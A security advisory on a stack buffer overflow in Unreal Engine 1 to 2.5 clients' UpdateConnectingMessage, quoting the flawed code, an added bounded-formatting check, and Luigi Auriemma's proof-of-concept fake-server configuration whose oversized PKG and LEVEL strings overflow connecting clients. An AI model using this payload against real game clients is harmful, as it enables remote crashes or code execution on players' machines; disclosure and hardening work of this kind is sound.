Unreal Game Engine UpdateConnectingMessage() Function Remote Stack Overflow Vulnerability

Affected systems:

Epic Games Unreal Engine 2.5
Epic Games Unreal Engine 2
Epic Games Unreal Engine 1

Description:

The Unreal engine is a networked game engine used by many games.

The Unreal engine client has a unicode buffer overflow in the UpdateConnectingMessage function, reached while the client downloads, or attempts to download, missing packages used by the server:

  void UGameEngine::UpdateConnectingMessage()
  {
      if(GPendingLevel && Players.Num() && Players(0)->Actor)
      {
          if(Players(0)->Actor->ProgressTimeOut < Players(0)->Actor->Level->TimeSeconds)
          {
              // fixed-size stack buffers of 256 TCHARs
              TCHAR Msg1[256], Msg2[256];
              appSprintf( Msg1, *LocalizeProgress(TEXT("ConnectingText"),TEXT("Engine")) );
              // URL.Host and URL.Map are supplied by the server; appSprintf bounds the write at 1024, not at the 256 of Msg2
              appSprintf( Msg2, *LocalizeProgress(TEXT("ConnectingURL"),TEXT("Engine")), *GPendingLevel->URL.Host, *GPendingLevel->URL.Map );
              SetProgress( Msg1, Msg2, 60.f );
          }
      }
  }

The overflow arises because appSprintf is a wrapper around _vsnwprintf with a limit of at most 1024 bytes, while the destination buffer is only 256 bytes.

The client is only affected by this vulnerability if downloads are enabled ([IpDrv.TcpNetDriver]->AllowDownloads=True), which most games do by default.
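As an added example, not part of the advisory or of the engine's code, the size mismatch described above in plain C: a check for when server-supplied Host/Map values would overrun a 256-character buffer, and a bounded replacement formatter that truncates and reports instead of overflowing. The format string, the helper names, and the use of snprintf/char in place of appSprintf/TCHAR are assumptions made for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP 256           /* TCHAR Msg1[256], Msg2[256] in UpdateConnectingMessage */
#define APPSPRINTF_LIMIT 1024 /* bound appSprintf gives _vsnwprintf; exceeds MSG_CAP */
/* Constructed stand-in for the localized ConnectingURL format; Host and Map are server-supplied. */
#define CONNECTING_FMT "Connecting to %s/%s..."

/* Characters the formatted message needs, not counting the NUL terminator. */
static size_t connecting_message_len(const char *host, const char *map)
{
    int n = snprintf(NULL, 0, CONNECTING_FMT, host, map);
    return n < 0 ? 0 : (size_t)n;
}

/* True when server-supplied Host/Map would overrun a MSG_CAP buffer. The 1024 bound on
 * the formatter does not help: 257..1024 characters still land past a 256-char stack buffer. */
static bool would_overflow(const char *host, const char *map)
{
    return connecting_message_len(host, map) + 1 > MSG_CAP;
}

/* Hardened formatter: write bounded by dst_cap, always NUL-terminated, truncation
 * reported as 1 instead of corrupting the stack. Returns 0 if it fit, -1 on bad args. */
static int format_connecting_message(char *dst, size_t dst_cap,
                                     const char *host, const char *map)
{
    if (dst == NULL || dst_cap == 0)
        return -1;
    int n = snprintf(dst, dst_cap, CONNECTING_FMT, host, map);
    if (n < 0) {
        dst[0] = '\0';
        return -1;
    }
    return (size_t)n >= dst_cap ? 1 : 0;
}

/* Self-check: a constructed 400-char map name is under the 1024 bound yet would overrun
 * Msg2; the hardened formatter truncates it instead. Returns 1 on pass, 0 on failure. */
static int check_long_map_is_contained(void)
{
    char map[401], out[MSG_CAP];
    memset(map, 'A', sizeof map - 1);
    map[sizeof map - 1] = '\0';
    if (!would_overflow("127.0.0.1", map))
        return 0;
    if (format_connecting_message(out, sizeof out, "127.0.0.1", map) != 1)
        return 0;
    return strlen(out) == MSG_CAP - 1;
}
```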

<*Source: Luigi Auriemma (aluigi@pivx.com)

  Links:
  http://secunia.com/advisories/40466/
  http://aluigi.altervista.org/adv/unrealcbof-adv.txt
*>

Test method:

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!

// Unreal engine <= 2.5 clients unicode buffer-overflow in UpdateConnectingMessage
// by Luigi Auriemma
// e-mail: aluigi@autistici.org
// web:    aluigi.org
//
// Advisory:
// http://aluigi.org/adv/unrealcbof-adv.txt
//
// - http://aluigi.org/testz/unrealts.zip
// - launch it: unrealts 7777 unrealcbof.txt
// - launch a game based on the Unreal engine
// - open the console (~)
// - type: open 127.0.0.1:7777
// - it's also possible to launch directly the game: game.exe 127.0.0.1:7777

// CHALLENGE can be random
CHALLENGE CHALLENGE=12345678

// GUID can be random
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=bof FLAGS=1 SIZE=1 FNAME=bof

// some games like SWAT4 require that LEVEL of WELCOME and this PKG are the same
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FLAGS=1 SIZE=1 FNAME=bof

// enable any possible type of download
DLMGR CLASS=Engine.ChannelDownload PARAMS=Enabled COMPRESSION=0
DLMGR CLASS=IpDrv.HTTPDownload PARAMS=http://127.0.0.1/ COMPRESSION=0

// LEVEL must contain the overflow and shellcode (the UDP packet must be max 576 bytes or less for some games)
WELCOME LEVEL=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LONE=0

Recommendation:

Vendor patch:

Epic Games
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.epicgames.com/
